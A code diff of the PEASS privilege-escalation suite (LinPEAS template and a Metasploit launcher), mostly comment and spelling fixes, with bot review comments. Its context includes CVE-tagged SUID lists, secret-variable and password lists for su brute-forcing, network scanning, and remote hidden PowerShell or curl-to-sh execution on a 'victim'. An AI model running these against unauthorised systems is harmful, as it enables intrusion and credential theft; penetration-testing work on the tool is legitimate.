sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$" -#Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION +# Rules: Start path " /", end path "$", divide path and vulnversion "%". 
SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\ /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22 @@ -392,7 +392,7 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" -#To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' +# To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' sidVB='peass{SUIDVB1_HERE}' sidVB2='peass{SUIDVB2_HERE}' cfuncs='file|free|main|more|read|split|write' @@ -428,7 +428,7 @@ for P in $ADDPATH; do if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi done -# test if sed supports -E or -r +# Test if sed supports -E or -r E=E echo | sed -${E} 's/o/a/' 2>/dev/null if [ $? -ne 0 ] ; then 
@@ -459,13 +459,13 @@ if ! [ "$USER" ]; then USER=$(whoami 2>/dev/null || echo -n "UserUnknown") fi if [ ! "$HOME" ]; then - if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home + if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; # Mac home else HOME="/home/$USER"; fi fi Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|') -#This variables are dived in several different ones because NetBSD required it +# These variables are divided into several different ones because NetBSD requires that. peass{VARIABLES} pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID" 
pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID" 
@@ -488,9 +488,9 @@ katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot 
badass asterix anna animals \ andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive \ plymouth pepsi patrick1 paradox milano 
maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" -PASSTRY="2000" #Default num of passwds to try (all by default) +PASSTRY="2000" # Default num of passwds to try (all by default) -if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this +if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi # If Network reduce the time on this SEDOVERFLOW=true for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do wgroups="$wgroups -group $grp -or " @@ -512,9 +512,9 @@ while $SEDOVERFLOW; do if [ $? -eq 0 ]; then SEDOVERFLOW=false else - MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1 + MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) # If overflow of directories, check again with MAXPATH_FIND_W - 1 fi - if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop + if [ $MAXPATH_FIND_W -lt 1 ] ; then # Prevents infinite loop SEDOVERFLOW=false fi done @@ -690,20 +690,20 @@ print_2title(){ START_T2_TIME=$(date +%s 2>/dev/null) fi - printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═" + printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC # There are 10 "═" } print_3title(){ - printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═" + printf ${BLUE}"══╣ $GREEN$1\n"$NC # There are 2 "═" } print_3title_no_nl(){ printf "\033[2K\r" - printf ${BLUE}"══╣ $GREEN${1}..."$NC #There are 2 "═" + printf ${BLUE}"══╣ $GREEN${1}..."$NC # There are 2 "═" } print_list(){ - printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═" + printf ${BLUE}"═╣ $GREEN$1"$NC # There is 1 "═" } print_info(){ 
@@ -712,7 +712,7 @@ print_info(){
 print_ps (){
 (ls -d /proc/*/ 2>/dev/null | while read f; do
- CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); #Delete my own sed processess
+ CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); # Delete my own sed processess
 if [ "$CMDLINE" ]; then
 var USER2=ls -ld $f | awk '{print $3}'; PID=$(echo $f | cut -d "/" -f3);
 printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE";
@@ -732,14 +732,14 @@ su_try_pwd (){
 su_brute_user_num (){
 BFUSER=$1
 TRIES=$2
- su_try_pwd "$BFUSER" "" & #Try without password
- su_try_pwd "$BFUSER" "$BFUSER" & #Try username as password
- su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & #Try reverse username as password
+ su_try_pwd "$BFUSER" "" & # Try without password
+ su_try_pwd "$BFUSER" "$BFUSER" & # Try username as password
+ su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & # Try reverse username as password
 if [ "$PASSWORD" ]; then
- su_try_pwd "$BFUSER" "$PASSWORD" & #Try given password
+ su_try_pwd "$BFUSER" "$PASSWORD" & # Try given password
 fi
 for i in $(seq "$TRIES"); do
- su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & #Try TOP TRIES of passwords (by default 2000)
+ su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & # Try TOP TRIES of passwords (by default 2000)
 sleep 0.007 # To not overload the system
 done
 wait
@@ -795,8 +795,8 @@ check_tcp_443(){
 check_icmp(){
 (timeout -s KILL 20 /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "Ping is available" || echo "Ping is not available") 2>/dev/null | grep "available"') 2>/dev/null || echo "Ping is not available"
 }
-#DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp
-#I cannot use this function because timeout doesn't find it, so it's copy/pasted below
+# DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp
+# I cannot use this function because timeout doesn't find it, so it's copy/pasted below
 check_dns(){
 (timeout 20 /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' ) 2>/dev/null || echo "DNS not available"
 }
@@ -813,7 +813,7 @@ basic_net_info(){
 }
 select_nc (){
- #Select the correct configuration of the netcat found
+ # Select the correct configuration of the netcat found
 NC_SCAN="$FOUND_NC -v -n -z -w 1"
 $($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)
 if [ $? -eq 2 ]
@@ -823,7 +823,7 @@ select_nc (){
 }
 icmp_recon (){
- #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses)
+ # Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses)
 IP3=$(echo $1 | cut -d "." -f 1,2,3)
 (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") &
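Review bot: In select_nc the probe is wrapped in a command substitution, `$($NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1)`, so the shell then tries to execute the (empty, redirected) output as a command, and the following `if [ $? -eq 2 ]` only sees the probe's status because POSIX defines an empty command's status as that of the last substitution. Running the probe directly, `$NC_SCAN 127.0.0.1 65321 > /dev/null 2>&1`, yields the same `$?` without that indirection and reads as intended. The rest of select_nc is outside the hunk.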
@@ -836,7 +836,7 @@ icmp_recon (){
 }
 tcp_recon (){
- #Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones
+ # Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones
 IP3=$(echo $1 | cut -d "." -f 1,2,3)
 PORTS=$2
 printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " "
@@ -856,7 +856,7 @@ tcp_recon (){
 }
 tcp_port_scan (){
- #Scan open ports of a host. Default: nmap top 1000, but the user can select others
+ # Scan open ports of a host. Default: nmap top 1000, but the user can select others
 basic_net_info
 print_title "Network Port Scanning"
@@ -884,7 +884,7 @@ tcp_port_scan (){
 }
 discover_network (){
- #Check if IP and Netmask are correct and the use fping or ping to find hosts
+ # Check if IP and Netmask are correct and the use fping or ping to find hosts
 basic_net_info
 print_title "Network Discovery"
@@ -899,11 +899,11 @@ discover_network (){
 exit 0
 fi
- #Using fping if possible
+ # Using fping if possible
 if [ "$FPING" ]; then
 $FPING -a -q -g "$DISCOVERY" | sed -${E} "s,.*,${SED_RED},"
- #Loop using ping
+ # Loop using ping
 else
 if [ "$NETMASK" -eq "24" ]; then
 printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC"
@@ -926,7 +926,7 @@ discover_network (){
 discovery_port_scan (){
 basic_net_info
- #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389
+ # Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389
 print_title "Internal Network Discovery - Finding hosts and scanning ports"
 DISCOVERY=$1
 MYPORTS=$2
@@ -945,7 +945,7 @@ discovery_port_scan (){
 fi
 PORTS="22 80 443 445 3389 $(echo $MYPORTS | tr ',' ' ')"
- PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) #Delete repetitions
+ PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) # Delete repetitions
 if [ "$NETMASK" -eq "24" ]; then
 printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC
@@ -1039,7 +1039,7 @@ if [ "$PORTS" ]; then
 printf ${BLUE}"$HELP"$NC; exit 0
 else
- #Select the correct configuration of the netcat found
+ # Select the correct configuration of the netcat found
 select_nc
 fi
 else
@@ -1083,12 +1083,12 @@ if [ "$PORT_FORWARD" ]; then
 exit 0
 fi
- #Check if LOCAL_PORT is a number
+ # Check if LOCAL_PORT is a number
 if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then
 printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
 fi
- #Check if REMOTE_PORT is a number
+ # Check if REMOTE_PORT is a number
 if ! [ "$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then
 printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
 fi
@@ -1098,7 +1098,7 @@ if [ "$PORT_FORWARD" ]; then
 fi
-#Get HOMESEARCH
+# Get HOMESEARCH
 if [ "$SEARCH_IN_FOLDER" ]; then
 HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/ ${ROOT_FOLDER}var/www/"
 else
@@ -1138,7 +1138,7 @@ elif echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | g
 fi
 if [ "$SEARCH_IN_FOLDER" ] || echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then
- #GENERATE THE STORAGES OF THE FOUND FILES
+ # GENERATE THE STORAGES OF THE FOUND FILES
 peass{STORAGES_HERE}
 ##### POST SEARCH VARIABLES #####
diff --git a/metasploit/peass.rb b/metasploit/peass.rb
index 0f9626a12..d8ec16f78 100644
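Review bot: The two numeric checks on LOCAL_PORT and REMOTE_PORT in the -1083 hunk print an error but do not stop, so a malformed PORT_FORWARD value carries on into whatever follows the hunk, while the branch immediately above them ends with `exit 0`. Ending each error branch the same way, `printf $RED"[-] Err: ..."$NC; exit 0` (or `exit 1` if a failure status is preferred), makes the validation actually take effect. The enclosing `if [ "$PORT_FORWARD" ]` block starts and ends outside the hunk.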
--- a/metasploit/peass.rb
+++ b/metasploit/peass.rb
@@ -18,7 +18,7 @@ def initialize(info={})
 'Name' => 'Multi PEASS launcher',
 'Description' => %q{
 This module will launch the indicated PEASS (Privilege Escalation Awesome Script Suite) script to enumerate the system.
- You need to indicate the URL or local path to LinPEAS if you are in some Unix or to WinPEAS if you are in Windows.
+ You need to indicate the URL or local path to LinPEAS if you are on any Unix-based system or to WinPEAS if you are on Windows.
 By default this script will upload the PEASS script to the host (encrypted and/or encoded) and will load, deobfuscate, and execute it.
 You can configure this module to download the encrypted/encoded PEASS script from this metasploit instance via HTTP instead of uploading it.
 },
@@ -52,18 +52,18 @@ def initialize(info={})
 end
 def run
- ps_var1 = rand(36**5).to_s(36) #Winpeas PS needed variable
+ ps_var1 = rand(36**5).to_s(36) # Winpeas PS needed variable
 # Load PEASS script in memory
 peass_script = load_peass()
- print_good("PEASS script successfully retreived.")
+ print_good("PEASS script successfully retrieved.")
 # Obfuscate loaded PEASS script
 if datastore["PASSWORD"].length > 1
 # If no Windows, check if openssl exists
 if !session.platform.include?("win")
 openssl_path = cmd_exec("command -v openssl")
- raise 'openssl not found in victim, unset the password of the module!' unless openssl_path.include?("openssl")
+ raise 'openssl not found on victim, unset the password of the module!' unless openssl_path.include?("openssl")
 end
 # Get encrypted PEASS script in B64
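Review bot: `if datastore["PASSWORD"].length > 1` in the -52 hunk raises NoMethodError when the PASSWORD option is nil; the option's definition (and whether it carries a default) is outside the hunk, so if it can be left unset, `if datastore["PASSWORD"].to_s.length > 1` is the safe spelling and costs nothing otherwise. The message wording fixes in this hunk are fine as they stand. run's body continues outside the hunk.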
@@ -82,7 +82,7 @@ def run
 # As the PS function is only capable of decrypting readable strings
 # in Windows we encrypt the B64 of the binary and then load it in memory
 # from the initial B64. Then: original -> B64 -> encrypt -> B64
- aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) #Base64 before encrypting it
+ aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) # Base64 before encrypting it
 peass_script_64 = aes_enc_peass_ret["encrypted"]
 key_b64 = aes_enc_peass_ret["key_b64"]
 iv_b64 = aes_enc_peass_ret["iv_b64"]
@@ -97,7 +97,7 @@ def run
 # If no Windows, check if base64 exists
 if !session.platform.include?("win")
 base64_path = cmd_exec("command -v base64")
- raise 'base64 not found in victim, set a 32B length password!' unless base64_path.include?("base64")
+ raise 'base64 not found on victim, set a 32B length password!' unless base64_path.include?("base64")
 end
 # Encode PEASS script
@@ -137,7 +137,7 @@ def run
 upload_file(temp_path, file.path)
 print_good("Uploaded")
- #Start the cmd, prepare to read from the uploaded file
+ # Start the cmd, prepare to read from the uploaded file
 if session.platform.include?("win")
 cmd = "$ProgressPreference = 'SilentlyContinue'; $#{ps_var1} = Get-Content -Path #{temp_path};"
 last_cmd = "del #{temp_path};"
@@ -146,7 +146,7 @@ def run
 last_cmd = " ; rm #{temp_path}"
 end
- # Instead of writting the file to disk, download it from HTTP
+ # Instead of writing the file to disk, download it from HTTP
 else
 last_cmd = ""
 # Start HTTP server
@@ -159,13 +159,13 @@ def run
 url_download_peass = http_protocol + http_ip + http_port + http_path
 print_good("Listening in #{url_download_peass}")
- # Configure the download of the scrip in Windows
+ # Configure the download of the script in Windows
 if session.platform.include?("win")
 cmd = "$ProgressPreference = 'SilentlyContinue';"
 cmd += get_bypass_tls_cert()
 cmd += "$#{ps_var1} = Invoke-WebRequest \"#{url_download_peass}\" -UseBasicParsing | Select-Object -ExpandProperty Content;"
- # Configure the download of the scrip in unix
+ # Configure the download of the script in Unix
 else
 cmd = "curl -k -s \"#{url_download_peass}\""
 curl_path = cmd_exec("command -v curl")
@@ -193,7 +193,7 @@ def run
 tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"].to_i)
- # If unix, then, suppose linpeas was loaded
+ # If Unix, then, suppose linpeas was loaded
 else
 cmd += "| #{decode_linpeass_cmd}"
 cmd += "| sh -s -- #{datastore['PARAMETERS']}"
@@ -259,7 +259,7 @@ def load_peass
 end
 def aes_enc_peass(peass_script)
- # Encrypt the PEASS script with aes
+ # Encrypt the PEASS script with AES (CBC Mode)
 key = datastore["PASSWORD"]
 iv = OpenSSL::Cipher::Cipher.new('aes-256-cbc').random_iv
@@ -333,7 +333,7 @@ def get_ps_aes_decr
 $csDecrypt = new-object System.Security.Cryptography.CryptoStream($msDecrypt, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Read)
 $srDecrypt = new-object System.IO.StreamReader($csDecrypt)
- #Write all data to the stream.
+ # Write all data to the stream.
 $plainText = $srDecrypt.ReadToEnd()
 $srDecrypt.Close()
 $csDecrypt.Close()
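Review bot: In the -193 hunk, `args=` and `time_out=` inside the `cmd_exec("powershell.exe", args=..., time_out=...)` call are ordinary local-variable assignments, not keyword arguments; Ruby passes their values positionally, so the call only works because the order happens to match cmd_exec's parameters, and the two locals are never read. Dropping the prefixes, `tmpout << cmd_exec("powershell.exe", "-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", datastore["TIMEOUT"].to_i)`, states what actually happens. The surrounding branch begins outside the hunk.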
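Review bot: In the -259 hunk, `OpenSSL::Cipher::Cipher.new('aes-256-cbc')` goes through the long-deprecated `OpenSSL::Cipher::Cipher` alias, which newer openssl gems warn about; `OpenSSL::Cipher.new('aes-256-cbc').random_iv` returns the same object and is the documented form. The comment change to "AES (CBC Mode)" matches the cipher name. The rest of aes_enc_peass, including how `key` is applied to the cipher, is outside the hunk.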